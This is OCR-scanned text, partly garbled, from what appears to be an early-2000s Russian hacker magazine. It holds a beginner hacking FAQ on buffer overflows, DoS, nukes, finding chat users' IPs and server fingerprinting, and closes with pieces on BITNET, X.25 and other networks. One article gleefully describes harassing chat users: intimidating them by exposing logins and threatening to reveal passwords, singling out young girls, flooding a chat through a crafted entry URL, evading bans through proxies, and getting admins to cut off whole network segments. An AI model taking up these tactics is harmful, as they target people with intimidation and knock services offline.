
Это петлевое сетевое соединение. Когда ты 
коннектишься к этому IP, ты коннектишься к 
самому себе :). Серьезно, я не шучу!!! Ког- 
да ты телнетишься туда, ты телнетишь- 
ся к своей собственной машине, 
когда ты лезешь туда браузе- 
ром, ты коннектишься со своим 
же меБ-сервером, и так во всех 
других случаях. Естественно, 
если у тебя на машине нет ни 
telnet-ceppepa, ни \меБ-серве- 
ра, ни каких-либо других серве- 
ров, то твой {ете(-клиент, браузер и 
прочий клиентский софт сообщат, что 
по данному адресу соответствующих серви- 
сов не найдено. Вспомнил прикол, хе-хе :). 
Было время, когда народ развлекался сле- 
дующим образом: материли кого-нибудь в 
чате, а когда тот в ярости начинал орать: 
“Ну, дай мне свою IP’WKY, если ты такой кру- 
той! Я тебя так занюкаю!" (сам-то IP опреде- 
лить не может, тоже мне хакер, млин!), да- 
вали ему IP 127.0.0.1. Тот, конечно, не ве- 
pun (уж слишком “блатная” IP’xa), но для 
верности все-таки нюкал :). Вот и получает- 
ся, что он нюкал самого себя :). 


28. Я слышал о каком- 
то SATAN’e. Кто это 
такой? 


Buffer overflow - переполнение буфера. Разно- 
видность атак, при которых серверному софту 
намеренно передаются данные такой длины, 
на прием которых он заведомо не рассчитан. 
Происходит переполнение буфера, принимаю- 
щего данные. Тот кусок данных, который не 
вписался в буфер, портит организацию стека, 
в котором он (буфер) сидит, отчего у проги 
происходят всякие глюки. Но это отстой - так 
ты максимум завесишь прогу. А вот будет кон- 
кретно рулить, если передать ей данные, по- 
добранные так, чтобы стек не просто сорвало, 
а чтоб “торчащие” из буфера данные, которые 
должны представлять собой машинный код, 
заменили собой данные в стеке памяти таким 
образом, при котором они в итоге получат уп- 
равление. Тогда считай, что ты выполнил этот 
самый машинный код на серваке. А что он бу- 
дет делать - это уже твоя фантазия :). Найти 
такую дыру в серверном софте ОЧЕНЬ сложно 
- хорошо написанный софт проверяет, чтобы 
принимаемые данные соответствовали нуж- 
ной длине, Однако, если ты окажешься нас- 
только крут, что найдешь в какой-нибудь час- 
то юзаемой админами проге такую дыру, то 
можешь считать себя самым настоящим про- 
фессиональным-гуру-элитным хацкером. Это 
не шутка. Большинство хакеров юзает уже 
найденные кем-то дыры buffer overflow. А на- 
ходить новые дано далеко не всем!!! Для это- 
го надо в первую очередь достать и изучить 
исходники софта, в котором ты собираешься 
искать дыру. Потом надо написать эксплоит, 
который все это реализует (не руками же на 
каждом новом серваке повторять). Ты, навер- 
ное, думаешь, что такие баги попадаются раз 
в тысячу лет и то в самых дрянных прогах? 


Тогда ты ошибаешься. Сходи на какой-нибудь 
сайт с эксплоитами и посмотри: дыры buffer 
overflow находятся в таких крутых и популяр- 
ных прогах, что прямо глаза на лоб лезут. 


30. Что такое wenn 
(shell)? 


Шелл - это то, что дает тебе возможность 
удаленно работать. Админ сервера, на кото- 
ром ты хочешь получить шелл, должен вы- 
дать тебе логин и пароль - учетную запись 
(это и есть шелл, в общем-то). Ты прителне- 
тишься к серваку своим ете-клиентом, 
введешь там эти логин и пароль и... полу- 
чишь возможность выполнять команды на 
нем. В зависимости от того, какие права 
твоему логину назначит админ (иначе гово- 
ря - насколько привилегированный шелл ты 
будешь иметь), ты сможешь выполнять те 
или иные действия, команды. Все это полу- 
чило название шелл, потому что через про- 
токол telnet ты работаешь с командным ин- 
терпретатором, с shell’om. Telnet - это прото- 
кол эмуляции терминала: работая через не- 
го, ты работаешь точно так же, как ты рабо- 
тал бы, если бы сидел в одной комнате с 
сервером за обычным реальным терминалом 
(монитор-+клава), подключенным к этому 
серверу, и имел бы учетную запись юзера. 
Так сложилось, что под словом “шелл” под- 
разумевают учетную запись именно на уда- 
ленной машине (работаешь через инет), а 
учетную запись в локальной сети (напри- 
мер, в твоем универе) называют логином. 


СПОВОБЛУОИЕ 


31. Что такое DoS- 
атака? 


DoS - Denial of Service (отказ в серви- 
се). DoS-aTakamu называются все 
атаки, в результате которых на 
атакуемом сервере выходит из 
строя (повисает, глючит, завер- 
шает работу) серверный софт. На- 

зываются эти атаки так потому, что 
после них юзерам не удастся воспользо- 
ваться сервисом на сервере (серверный 
софт-то упал - некому обслуживать клиен- 
тский софт). Вот если ты проведешь buffer 
overflow-ataky на web-cepBep, в результате 
которой он повиснет, юзеры не смогут свои- 
ми браузерами получать хтмл-странички с 
сайтов, хостящихся на этом сервере, до тех 
пор, пока админ не заметит такое безобра- 
зие и не перезагрузит серверный софт (web- 
сервер). Это будет типичная Ооб-атака. Еще 
одним ярким представителем DoS-atTak яв- 
ляются флуд-атаки. 


32. А что такое флуд- 
атака? 


Флуд - это такая атака, когда сокет (сервер- 
ный софт) бомбардируют/забивают большим 
количеством запросов. На обработку этого 
большего количества запросов сервер пос- 
лушно тратит большее количество времени 
и ресурсов, так же, как он обрабатывал бы 
их, если бы это были запросы от обычных 
юзеров. На обычных же юзеров ему уже не 
хватает ни времени, ни ресурсов ;). Весь 
смысл флудинга состоит в том, чтобы до- 
биться Оо$-эффекта, то есть флуд - это од- 
на из разновидностей многочисленных DoS- 
атак. Помнишь, было время, когда юзеры в 
инете активно пинговали друг друга, выки- 
дывая этим из сети. Вместо одного запроса 
на пинг (проверка скорости соединения) 
слалось огромное количество таких запро- 
сов - классическая флуд-атака. 
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найди в инете проги, которые профессио- 
нально занимаются выковыриванием = IP’x 
твоих врагов из аськи. Есть и патчи для са- 
мого клиента ICQ, вправляющие ему мозги и 
заставляющие показывать IP, и отдельные 
проги, показывающие ТР в своем окне, А ес- 
ли ты в web-yaTe, то здесь все намного 
сложнее :). Вот как работает меБ-чат: ты 
постишь через какие-то скрипты мессагу по 
НТТР в какой-то файл на сервере, и все ос- 
тальные перцы в этом чате делают то же са- 
мое. Потом, через какой-то интервал време- 
ни, вы все загружаете (обновляете) этот 
файл в своем браузере и видите мессаги 
друг друга. Получается, что напрямую вы 
никак не связаны. Стало быть, IP другого 
человека ты узнать не можешь. Но и здесь 
есть вариации :). Для админа чата узнать IP 
юзера так же легко, как тебе два... 399... 
два раза сплюнуть :). Поэтому, когда они 
пишут свои чаты, часто используют IP юзе- 
ров для каких-нибудь внутриорганизацион- 
ных нужд (например, чтоб банить нежела- 
тельных посетителей). Значит, сам чат 
знает IP своих юзеров. В очень многих web- 
чатах бывают ошибки, благодаря которым 
иногда удается этот самый ТР получить у ча- 
та. А если ошибок нет, можно самому орга- 
низовать на шелле маленький скрипт, кото- 
рый будет показывать IP посетившего его 
человека. Так, если меб-чат поддерживает 
хтмл-теги, то легко можно скормить свой 
скрипт всем посетителям чата, узнав таким 
образом их IP. Если же и хтмл-теги не под- 
держиваются, тогда придется как-то по-дру- 
гому заманивать на свой скрипт юзера, чей 
IP надо узнать. 


34. Что такое nuke 
(нюк)? 


33. Как можно узнать 

IP’wiky человека, с ко- 

торым я говорю в ча- 
те? 


Все зависит от того, что ты подразумеваешь 
под словом “чат”. Если ты в ирке (ну что ты 
так на меня смотришь? я имел в виду не 
твою соседку с седьмого этажа - Ирку, а IRC 
:)), то набери команду /DNS usrname, где 
usrename - ник чела, IP которого ты хочешь 
узнать. Если же ты в аське (ну вот, опять! не 
я же это придумал!!!), посмотри ТР’шник в 
инфо юзера. Если чел скрыл свой IP или ты 
юзаешь свеженький клиент аськи (который 
не имеет функции показывания 1Р”шников), 


Это атака на машину в сети под управле- 
нием M$ Win. Нюк-прога отправляет на съе- 
дение виндам пакет, получив который, вин- 
да виснет, показывая юзеру Синий Экран 
Смерти. Основана эта атака на ошибках в 
реализации TCP/IP в винде. Самый первый 
нюк - winnuke.c. Нюки получили большое 
распространение благодаря тому, что для 
проведения атаки достаточно знать IP жер- 
твы и иметь нюк-программу. Сейчас гово- 
рить о нюках неактуально, так как, хоть и с 
большим опозданием, но М$ выпустила для 
своих ранних осей патчи, затыкающие дыры 
в их реализации TCP/IP, а в новых осях этих 
ошибок и вовсе нет. 


35. Что такое 31337? 


31337 - это циферное обозначение слова 
“элита” в околохацкерских кругах ;). Есть 
хакерская группа с таким названием, попас- 
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ть в которую считается большей честью, - 
элитная :). Кроме всего прочего, это цифро- 
сочетание прославилось тем, что на порту с 
номером 31337 по умолчанию висит троянец 
BO. 


36. Как узнать айпи 
“сервака по его домен- 
ному имени? 


Есть много всяких способов: 

Самый дебильный, но самый простой способ 
- залезть браузером на web-cepBep этого 
сервака. В процессе загрузки большинство 
браузеров показывают IP сервера в status- 
bar’e (в строке статуса, обычно находится в 
самом низу окна). Ну, типа, пишут сначала 
“Looking up host name <имя хоста>” (в это 
время браузер коннектится к DNS-cepBepy и 
просит у него ТР хоста), а потом - 
“Connecting to <айпишка хоста>”. Если не 
успеваешь посмотреть айпишку хоста (быс- 
тро пропадает), нажми кнопарь PrintScreen - 
я же говорил, что способ дебильный :). 
Можно воспользоваться службами типа 
www.all-nettools.com. Там есть онлайн-вер- 
сия whois. Вводишь домен (или IP) сервера, 
и тебе выдается вся доступная информация 
о нем, в том числе и ТР, и доменное имя, и 
название организации-владельца, и много 
чего еще. Можно также воспользоваться 
прогами типа SmartWhois. 


-.37. Как узнать, под ка- 
"кой ОС сидит сервак? 


Зателнеться к нему на telnet-cepBep и почи- 
тай там текст приглашения (в нем обычно 
бывает указана ось). Это не самый лучший 
способ, так как админы часто меняют назва- 
ние оси в этом приглашении, чтобы запутать 
хацкеров ;). Но мы их, как всегда, перехит- 
рим ;). Заходи telnet’om на 80-ый порт (web- 
сервер) и формируй кривой запрос POST. 
Для этого прямо руками надо написать сле- 
дующее: 

POST bla bla 

bla 

bla 

Пишешь слово “POST”, потом пробел, набор 
любых символов, еще пробел, еще набор лю- 
бых символов, жмешь Enter, еще один набор 
символов, опять Enter и еще набор символов 
и Enter. Получив такой ужасный POST-3an- 
рос, web-cepBep, естественно, начнет пле- 
ваться: он вернет тебе ответ, состоящий из 
заголовка и тела-хтмлки. Все это, включая 
заголовок ответа, отобразится у тебя на 
экране - ты же в telnet’e, а не в браузере :). 
В этом самом заголовке, кроме всего прочего 
(даты, номера ошибки, content-type’a и етс), 
будет содержаться информация о самом web- 


СПОВОБЛУОИЕ 


сер- 

вере - напри- 

мер, “Server: Apa- 
che/1.3.12 (Unix) (Red 


Hat/Linux)”. Ham, кроме это- 
го, больше ничего и не надо 
:). Существуют также всякие 
сканеры, которые могут опре- 
делять ОС на удаленном серве- 
ре. 


38. Что значит 

“дырявый 

скрипт”? Как это 
использовать? 


Дырявый скрипт - это такой скрипт, ко- 
торый содержит в себе ошибки, позволяю- 
щие нарушить безопасность сервера. Иначе 
говоря, это криво написанный скрипт. Обыч- 
но дырки находятся в тех скриптах, которые 
не проверяют четко какие-либо значения 
или выполняют какие-либо неконкретизиро- 
ванные действия (удаляют, читают, записы- 
вают, создают, меняют атрибуты файлам, 
имена которых не заданы конкретно или, что 
еще хуже, берутся скриптом откуда-нибудь 
извне). Для того чтобы использовать дыря- 
вый скрипт, надо знать описание его дыр, 
надо знать, что и как ему постить (диалог с 
ССГшками происходит методами протокола 
НТТР). А для того чтобы самому найти дырку 
в скрипте, надо иметь его исходник и надо 
уметь программировать на том языке, на ко- 
тором он написан :). 


что от- 
сылаемый в 
его составе 
машинный код 
выполняется на 
сервере (про все 
это я уже расска- 
зывал). После это- 
го ты берешь и пи- 
шешь маленькую 
программку на своем 
любимом языке (чаще 
всего это бывает С) и 
выкладываешь ее в 
инет, чтобы все желаю- 
щие могли скачать ее и 
юзнуть на полную катушку, 
если наткнутся где-нибудь 
на тот серверный софт, в ко- 
тором ты отковырял свою 
buffer overflow дырку. Эта прог- 
рамма должна просто отсылать 
пакет найденного тобой формата серваку с 
дырявым софтом. И все. Эксплоиты обычно 
распространяют в виде исходников. Короче 
говоря, любая программа, которая нарушает 
безопасность сервера на основе какой-либо 
дырки, является эксплоитом. Представь се- 
бе, нюк - это тоже эксплоит (он ведь валит 
винды на основе имеющегося в них бага). 


= 


40. Кто придумал ма- 
" нифест хакера? 


Манифест хакера придумал наставник хац- 
керской группы “Легион Хакеров” в январе 
1986 года. Наверное, его вдохновил факт 
обвинения в краже и последующего ареста - 
надо же было как-то отмазаться, хотя бы мо- 
рально ;). 


„39. Что такое 
эксплоит? 


„41. Хакер и киберпанк 
— это одно и то же? 


Эксплоит - это обычная программка, которая 
реализует какую-нибудь дыру. Написать 
эксплоит очень просто, трудно найти и изу- 
чить (описать) дыру, которую он будет реа- 
лизовывать. Представь, что ты смог найти 
дыру buffer overflow в каком-нибудь сервер- 
ном софте. Причем ты круто все посчитал и 
подобрал пакет такого вида и такой длины, 


Нет. Хакер - это человек, который несан- 
кционированно проникает в защищенные се- 
ти. А киберпанк - это такая субкультура. Но 
очень часто хакеры бывают киберпанками, а 
киберпанки - хакерами. И вообще, хакинг 
ведь тоже культура :), считай, что 
киберпанк - родственная хакингу 
культура. 


м 


БЛЯ-БЛЯ 


НЯНЕР > ФЕВРЯЛЬ 701 


Ох чж MHE эти ваши 


чат bl... 


UNFORGIVEN (UNFOGI@SANET.RU) 


Нет ничего веселее, чем картины, когда ты FOBO- 
ришь кому-нибудь, что ты знаешь про него все ион 
в твоих руках - “А вот, пожалуйста, и логинчик 
твой... Что, назвать всем пароль?”. Поверь мне, 
многие хорошо ведутся, особенно молодые нео- 
пытные девушки (это, кстати, отличный повод к 
близкому знакомству). Хотя сетевик со стажем 
этим не напугаешь. 


лем. Если нет, то всё равно еще успеешь. Какой 
же ты хацкер, если и воевать-то не с кем? В об- 
щем, пора учиться тебе, мой молодой друг, а то 


Здорово, кул-хацкер! В чатах бываешь? ОбЧА- 
Тишься? Тогда, дело ясное, ты уже успел нажить 
себе кучу врагов, а заодно с ними и кучу проб- 


потом уже будет поздно :). Попадешь в компа- 
нию администраторов, не дай Бог, - они ж тебя 
плохому научат! 


Настало время тебе узнать об издеватель- 
ствах в сети. Я бы сказал даже, настало вре- 
мя подметить никем не подмеченное и ис- 
пользовать это в своих корыстных целях 
(конечно, корыстных, а иначе что же 

это за цели?). Ну, поехали. 


Всю жизнь, сколько себя 
помню, любил я со 
ВСЯ - 


WAN 


Wl 


И вообще, дырки есть в 
каждом чате. Их только 


найти надо. 


кими ламаками в чатах побазарить. Обожаю, так 
сказать, распределенные транзакции, и ничего 
здесь не поделать. Как обычно, ползу в чат. Не- 
давно юзал чат на БАШНЕ - ну, знаешь, такая 
прога, не под винды, а под телик. Называется 
“информационно-развлекательная программа 
Башня!". Идешь в старый чат (на новом эта фи- 
ча не работает, да и не базарит там никто). Как 
только открылся у них сайт, я излазил его вдоль 
и поперек в целях поиска дыр, а потом пошел 
чатиться со всеми. 
Главный прикол чата Башни был вот в чем. 
Имелась там такая кнопочка - “шепнуть”. На- 
жав на нее, можно было послать фразу кон- 
кретному челу. Но кнопка оказалась непрос- 
той. При внимательном рассмотрении в поле 
мессаги было видно, кому ты посылаешь фра- 
зу - вместо ника чела высвечивался его ло- 
гин. Как пароль получить, я тебе рассказы- 
вать не буду - сам разберешься, как говорит- 
ся, “на местности”, если захочешь. Но даже 
не зная пароля, можно здорово попугать ла- 
меров. Нет ничего веселее, чем картины, ког- 
да ты говоришь кому-нибудь, что ты знаешь 
про него все и он в твоих руках - “А вот, по- 
жалуйста, и логинчик твой... 
Что, назвать всем па- 
ponb?”, Поверь мне, 
многие хорошо ве- 
дутся, особенно 
молодые 
неопыт- 
ные 
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Какой же ты хацкер, 
если и воевать-то не с 
кем? В общем, пора 
учиться тебе, мой мо- 
лодой друг, а то потом 
уже будет поздно :). 
Попадешь в компанию 
администраторов, не 
дай Бог, - они жтебя 
плохому научат! 


девушки (это, кстати, отличный повод к близ- 
кому знакомству). Хотя сетевика со стажем 
этим не напугаешь. 

В конце концов, конечно, меня это дело дос- 
тало, и тогда я решил попугать бедный на- 
род по-другому. Доказать им всем, что они... 
дальтоники. Нет, ты не ошибся, так назы- 
вают людей, не различающих цвета. Этот 
прикол чата состоял в том, что он, как и все 
чаты, пропускал лишь тэги цвета шрифта и 
еще пару каких-то. И фишка в том, что ког- 
да вставляешь тэг <font color = “Lightblue”>, 
вместо голубого вылезал офигительно крас- 
ный. С помощью этой милой радости я спи- 
сал “в дальтоники” около полусотни чело- 
век, включая девушек (как известно, у них 
за всю историю планеты случаев дальтониз- 
ма не было зарегистрировано - он поражает 
только мужчин). 


Перейдем к другому чату. Чат на РЕМЕ. Вроде 
бы, ничего примеЧАТельного, но есть там такая 
приятная гадость... :) Для того, чтобы войти в 
чат, не надо вводить пароль, нужен только ник. 


С помощью этой милой радости я спи- 
сал “в дальтоники” около полусотни 
человек, включая девушек (как извес- 
тно, у них за всю историю планеты 
случаев дальтонизма не было заре- 
гистрировано - он поражает только 


мужчин). 


То есть с одной машины, с одного ТР (!!!) может 
сидеть сколь угодно много человек. Вот тут-то и 
невзлюбили меня местные модераторы. Сначала 
я зарегистрировал за собой один ник, потом еще 
один, еще один... и так оказалось в чате 102 че- 
ловека. 100 из них - это я! :), аеще 2 - адми- 
ны, которые долго мучались, убивая меня :). Как 
это сделать, спросишь ты? А очень просто! 
Вместо name=Unforgiven подставляешь 
http://www.chatrema.com/cgi- 
bin/entry.pl?name=Unforgiven&submit=send. 3a- 
меть, как круто! Даже страницу перегружать не 
надо. 

Но есть тут небольшие проблемки (без них и 


жить неинтересно!). Глупые админы не пони- 
мают приколов и так и жаждут отстрелить те- 
бя по айпишнику. Но и на это найдется упра- 
ва. Мотай на ус наш метод (хотя, конечно, ес- 
ли тебе не в лом - можешь сбегать к соседу и 
поиздеваться над модерами с его компа :)). 
Существуют такие немудрые штуки под наз- 
ванием “прокси-сервер”. Фишка в том, что 
после захода на прокси-сервер твой трафик 
идет через него. Тем самым маршрутизатор 
меняет свой ip (и, к TOMY же, в большинстве 
случаев инет становится намного быстрее - 
если, конечно, ты не подрубился через ка- 
кой-нибудь чукотский прокси-сервер). Если 
фишку не просек, то зайди в любую поиско- 
вую систему и набери “ргоху” - поисковик вы- 
даст тебе кучу ссылок, большая часть кото- 
рых окажется мертвыми, но ты все же най- 
дешь то, что искал - а именно адрес ЖИВОГО 
прокси (о том, как проверить проксю на 
“скислость”, мы уже писали в Х). В свойствах 
обозревателя пишешь адрес и коннектишься. 
Опа! - у тебя другой сетевой адрес. Теперь ты 
снова в чате. И так можно до бесконечности - 
пока прокси не кончатся. Когда надоест 
и это, можно подключить верных 
друзей - и получится целая 
Интернет - армия сетевых 
вредителей. Вы налетите на 
бедняг-модераторов и снесете 
чат на фиг. 

Дальнейшие варианты развития 
событий следующие: 

1. Ламерам в чате скоро на- 
доест смотреть надписи типа: 
“Unforgiven зашел в чат”, 
“Поприветствуем Unforgiven”, 
и они сами все свалят :). 

2. В ча- 
те есть ограничение 
числа присутствую- 
щих. Хоть это число и 
большое, но, поверь 
мне, если будешь ста- 
раться - то 


“стек оверфлоу” неж- 
данно-негаданно наг- 
рянет, и сервак завис- 
нет :). 

Еще одна фишка - са- 
мая, пожалуй, клас- 
сная. Если в этом чате 
ты сидишь не один из 
далекого города Н, а 
за хорошую компа- 
нию, то можно клас- 
сно оторваться на 
земляках. Суть вот в 
чем: иногда админы, 


BNA-BAA 


чтобы долго не мучаться, вместе с тобой от- 
рубают еще огромный сегмент сети. Вот, нап- 
ример, мне один раз повезло, и вырубили не 
только мою машину, но и весь мой родной го- 
род. А в чате сидело полтора десятка земля- 
ков. В общем, можно навредить так: наорать 
на админа. Он тебя вырубит и, если повезет, 
вырубит еще и толпу народу - до кучи. 


Дело ясное - методы издевательства, которые 
я здесь привел, работают не только в указан- 
ных мной чатах - порывшись в сети, ты най- 
дешь еще не одно местечко, где можно их 
применить. И вообще, дырки есть в каждом 
чате. Их только найти надо. Так что садись в 
любой чат и - вперед, ламеров шерстить! Это 
наш имидж, приятель :). Удачи. 


Matt FoR (MATT@NM.RU) 


ервая мысль, которая возникает у 
Г тебя или у большинства юзеров, 
продвинутых юзеров или любого 
другого, не совсем отставшего от жизни че- 
ла, при необходимости найти какую-то ин- 
формацию, - Интернет! И очень многие, осо- 
бенно недалекие неинтернетизированные 
юзера, считают, что: 
1. В Интернете есть все, 
2. Других сетей, кроме Интернета, не су- 
ществует. 
На самом деле это глубокое общественное 
заблуждение. Интернет - это, конечно, 
вещь, и в Сети действительно можно найти 
практически все, и охватывает она действи- 
тельно огромное количество компьютеров и, 
соответственно, информации. Но это не зна- 
чит, что других сетей не существует. В кон- 
це концов, с чего начинался Инет? 


Арпанет и что было потом 


А начинался он с военно-научной сети 
Arpanet, разработанной по заказу Минис- 
терства обороны США. Про эту сетку ты мо- 
жешь подробно прочесть в этом же номере 
в отдельной статье. Ну, так вот. Первой от- 
дельной сетью, которую Агентство DARPA 
(создатели Arpanet) разрешило подключить 
к АКРАМЕТ еще в 1980 г., стала CSNET, 
объединившая компьютерные научные уч- 
реждения нескольких штатов. Вскоре эта 
сеть слилась с BITNET. Сейчас ВИМЕТ - ста- 
рейшая (после Инета) глобальная сеть в 
мире, которая располагает сетевым досту- 
пом к распределенным базам разных науч- 
ных данных и объединяет немерено униве- 
ров и НИИ по всему миру. У Битнета есть 
несколько “представительств” в разных 
частях света: EARN (European Academic 
Research Network - западная и центральная 
Европа - национальные исследовательские 
центры Германии, Франции, Италии, Англии 
и прочих Нидерландов, Бельгии, etc.) и 
NetNorth (Канада). Научная сеть BITNET, 
многие ресурсы которой доступны через 
Интернет, не является частью Инета, так 


как имеет свои собственные протоколы. А 
залезть в нее можно через так называемые 
шлюзы, которые выполняют роль “перевод- 
чиков” протоколов. В МЕТ преимуществен- 
но юзает 1ВМ-совместимые компьютеры 
(IBM 370 и старшие модели) и соответ- 
ствующий фирменный протокол NJE 
(Network Job Entry). Для Internet сеть ВП- 
МЕТ имеет важное значение по нескольким 
причинам: 

а) хосты ВИ МЕТ используют исключительно 
мощные вычислительные и сетевые ресур- 
сы; 

6) в BITNETe действует сервер списков рас- 
сылки электронной почты LISTSERV, обслу- 
живающий десятки тысяч ушастых юзверей 
Инета; 

в) в BITNET хорошо развит режим электрон- 
ной почты, что, благодаря многим шлюзам 
Internet-BITNET, создает высокую степень 
связности пользователей BITNET и Интер- 
нет по обмену почтовыми сообщениями. 

С 1991 г. CCCP (ну а потом, соответственно, 
и Россия) вошли в состав стран-участниц 
EARN. Узлом российской подсети EARN яв- 
ляется Институт органической химии им. 
Зелинского. Так что теперь ты знаешь, где 
искать вход в глубокую кроличью нору =). 


Собирайтесь ВУЗы в кучу, я 


вам чучу отчебучу 


Национальный Научный Фонд (NSF) вскоре 
понял, что коммюнити будет необходимой 
частью научных исследований (вместе и 
водку пить веселее), и создал Отдел Сете- 
вых и Коммуникационных Исследований и 
Инфраструктуры, чтобы быть уверенным, 
что все необходимое для сетевого взаимо- 
действия будет доступно буржуйским уче- 
ным и инженеГрам. Хотя этот отдел финан- 
сирует крутые (реально) исследования в 
области сетей, его основной задачей яв- 
ляется финансирование тех исследований, 
которые помогают расширять Интернет. 

Одна из крупнейших “подсетей” Инета, 
NSFnet, имеет иерархическую структуру и 
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Что, скажешь, мол, я 
так и знал - кроме Ине- 
та для меня ни одна из 
этих сетей ценности не 
представляет? Не 
факт. Никто не знает, 
как обернется жизнь и 
что может с любым из 
нас произойти зав- 
трашним днем. Так что 
- мотай на ус! Вдруг 
пригодится... 


концентрируется вокруг крупных универси- 
тетских центров США. Можно догадаться, 
что реклама здесь запрещена, хотя если ты 
написал прогу, которая моделирует ядер- 
ный взрыв или отображает движение моле- 
кулы воды в растворе этилового спирта, то 
ты сможешь ее распространять в этой сети. 
Коммерческие предложения и реклама за- 
нимали значительную часть трафика, и 
поэтому нужно было обойти все ограниче- 
ния. С этой целью тусовкой американских 
компаний была создана Ассоциация обмена 
коммерческой информацией по Internet 
(СХ). Эта сеть, как и Инет, работает на ос- 
нове протокола TCP/IP (правда, еще и 
051/150). 


Опять научные исследова- 


Еще одна (наиболее крупная) европейская 
компьютерная сеть EVnet (Network for the 
Evaluation of Education and _ Training 
Technologies) работает с 1982 года и объе- 
диняет практически всю Европу, включая 
региональные представительства в странах 
Прибалтики и России. EUnet объединяет 
около пяти тысяч хост-машин и отдельных 
сетей. Особый статус имеют национальные 
сети (EUnet National Networks), которые в 
админском плане организуют свою работу 
через Национальный Сетевой Операцион- 
ный Центр (National Network Operations 
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Интернет - это, конечно, вещь, ив Сети действи- 
тельно можно найти практически все, и охватывает 
она действительно огромное количество компью- 
теров и, соответственно, информации. Но это не 
значит, что других сетей не существует. 


Center). К EVNet подключено 14 универов, 
пять техникумов (колледжей по-ихнему), 
три школы, 21 частная контора, 5 гос. аген- 
тств и еще куча всяких учреждений, кото- 
рые выделяют на эту сеть денег больше, 
чем правительство и все фонды, вместе 
взятые. В России EVNet, как и NFSNet, 
представляет Релком (это если кто наду- 
мает вдруг). 


GLASNet 


Сеть GLASNET действует под эгидой “Ассо- 
циации за прогрессивные коммуникации” 
(АРС - Association for Progressive 
Communication) и объединяет несколько не- 
коммерческих компьютерных гуманитарно- 
экологического сетей - PeaceNet, EcoNet, 
GreenNet, Comlink и ряд других. Сейчас в 
АРС объединено более 11 компьютерных 
сетей, 17 тыс. организаций и частных лиц 
из 94 стран. Основная служба GLASNET и 
других сетей АРС - это, как всегда, е-мыло. 
Пользователям пре- 

доставляется воз- 

можность участво- 

вать в более чем 

1200 тематических 

конфах по пробле- 1 

мам молодежи, разо- 

ружения, образования, окру- 
жающей среды, прав человека, здра- 
воохранения, региональной политики, де- 
мографии и прочей хренобени. Короче го- 
воря, смесь гринписа с пацифистами. 


Х25МЕТ 


CSNET(CSNET и BITNET слились в CREN) - 
организация, образованная в 1980-м для 
поддержки Интернета в промышленных и 
малых школах, использовала технологию 
Х25МЕТ для соединения некоторых пользо- 
вателей с Инетом. Первоначально разрабо- 
танная в универе города Пурдью, Х25МЕТ 
позволяла протоколам Инета работать в Об- 
щественных Сетях Данных (Public Data 
Networks). Такой подход должен был позво- 
лить конторам, для которых было не по 
карману прямое соединение с АВРАМЕТ, за- 
казывать сетевое соединение у фирмы-пос- 
тавщика средств дальней связи (что-то ти- 
па прова - например, AT&T) и использовать 
его для передачи трафика Интернета. Такие 


сети используют только протоколы МККТТ 
Х.25, в то время как Инет работает Ha про- 
токолах TCP/IP. Тем не менее, когда она ис- 
пользуется для транспортировки трафика 
TCP/IP, сеть Х.25 просто обеспечивает путь, 
по которому может быть передан трафик 
Интернета. Так как общественные сети Х.25 
работают независимо от Инета, должно су- 
ществовать место соединения между ними. 
Как DARPA, так и CSNET используют cne- 
циально выделенные машины для обеспе- 
чения соедине- 
ния между 


<2 


ay. 


о 


Х.25 и АВРАМЕТ. Основное соединение из- 
вестно как \/АМ-шлюз. Эта хрень поддержи- 
вает соединения Х.25 и маршрутизирует 
приходящий трафик Интернета к его полу- 
чателям. Х25МЕТ показывает гибкость и 
адаптируемость протоколов ТСРЛР. В час- 
тности, она показывает, как туннельная пе- 
редача делает возможным использование 
очень широкого диапазона сложных сете- 
вых технологий в межсетевой среде. 


Что, скажешь, мол, я так и знал - кроме Ине- 
та для меня ни одна из этих сетей ценности 
не представляет? Не факт. Никто не знает, 
как обернется жизнь и что может с любым из 
нас произойти завтрашним днем. Так что - мо- 
тай на ус! Вдруг пригодится... 
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CETU NAKETHOU 


коммутации типа Х.>25 


UNFORGIVEN (UNFOGI@SANET.RU) 


Я — 


ы уже давно задаешься вопросом, по- 
i чему некоторые сети тебе доступны, a 
некоторые совершенно неприступны 
как Бастильская крепость? Ты не спишь по 
ночам и изучаешь сети TCP\IP. Но не это глав- 
ное, скажу я тебе. Главное - это сети пакет- 
ной коммутации. И вообще, куда полезнее 
изучать различные проги типа телнета - 
ведь именно с помощью их ты меняешь 
столь любимый тобой индекс.нтмл. 
В общем, бросай все свои занятия и 
срочно за работу. 


Мешковатые авоськи 


Каждая сеть пакетной коммутации сос- 
тоит из большого (или небольшого - в за- 
висимости от самой сети) количества ЦКП 
(Центров Коммутации Пакетов). Эти цен- 
тры могут располагаться хоть на разных 
концах света, самое главное, чтобы они 
вообще присутствовали, так сказать, 
имелись :). Пролезть в такую сеть 
обыкновенному юзеру совсем не 
сложно - делается это, как всегда, 
с помощью твоего, пожалуй, са- 
мого нужного девайса, который 
отвечает за всю твою хацкер- 
скую жизнь, - телефона. Не- 
важно, где находится удален- 
ная машина, но с твоей соеди- 
няется она, как всегда, с по- 
мощью телефона. Для примера 
покажу тебе вот какой листинг: 
ты великий юзверь, всем юзве- 
рям юзверь. Ты пролезаешь в 
сеть, звоня при этом провайдеру 
(если, конечно, ты не настолько 
крут и не имеешь в своем наличии 
оптиковолоконки или, чего хуже, 
спутниковой связи). Ну дак вот: ЦКП 
является твой провайдер. А вот кем 
являешься ему ты - это уже тебе ре- 
шать :). Причем, надо засечь вот ка- 
кую фишку: эти сети не совсем обычны. 
Абоненты такой сети подключаются и пе- 
редают потоки информации, соединяясь меж- 
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ду собой с помощью протоколов и ЦКП. При 
этом создается так называемое виртуальное 
соединение. Не, это не то, что ты подумал, 
никаких врмлов там нет. Просто это времен- 
ное логическое соединение двух машин для 
обмена информацией с помощью ЦКП - во 
сказал :). 

Еще стоит заметить столь замечательную 
вещь: сеть КП - дуплексная. Для тех, кто в 
танке, объясняю: дуплексная значит двухсто- 
ронняя, а в данном случае это означает, что 
юзвери могут бросать пакеты оба одновре- 
менно, и при этом сеть работает практически 
без задержек. Кстати, одной из таких чудо- 
сетей является X25. 

Зачастую на таких сетях строят подобия 
АКРАМЕТ - их целая куча, но тебя, конечно, в 
эту проблему никто не посвятил. Проблема 
общения с этими сетями в том, что сетью мож- 
но пользоваться только с помощью специаль- 
ных прог - так называемых падов. А там ко- 
манд - не раз и два, а целая куча. И разоб- 
раться с такой прогой может не каждый. Но 
ты сможешь! Для начала надо ознакомиться с 
четырьмя основными понятиями этой сети и 
разучить основные команды. В этом я тебе 
